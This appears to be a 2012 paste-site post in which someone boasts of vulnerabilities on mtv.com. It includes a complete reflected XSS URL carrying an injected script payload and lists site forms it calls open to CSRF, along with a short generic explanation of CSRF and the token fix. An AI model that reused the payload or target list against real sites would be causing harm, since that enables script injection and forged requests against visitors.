human_mind_cracker

report4:mtv.com

Oct 28th, 2012
**********************************************************************************************
Target: www.mtv.com

[**] XSS:

http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?footprintUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml&thisUrl=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20on%20MTV%20website%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E

"Works only on Mozilla Firefox"

[**] Cross-site Request Forgery:

Cross-site Request Forgery (CSRF) is a type of attack whereby unauthorized commands are transmitted from a user that the application trusts. Unlike Cross-site Scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

Solution: URLs and forms that perform important operations must be protected by random tokens (hidden nonce values). These tokens must be checked for validity at the server before the request is processed.

url: http://www.mtv.com/artists/bridgit-mendler/

form: <form method="POST" action="http://www.mtv.com/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.mtv.com/mobile/

form: <form method="POST" action="http://www.mtv.com/mobile/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.mtv.com/mobile/faqs/

form: <form method="POST" action="http://www.mtv.com/mobile/faqs/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>

url: http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?thisUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml&footprintUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml

form: <form method="POST" action="http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?thisUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Finde...


[**] Email Disclosure:


Picture of XSS vuln: http://www.imagup.com/data/1166124931.html

Human mind cracker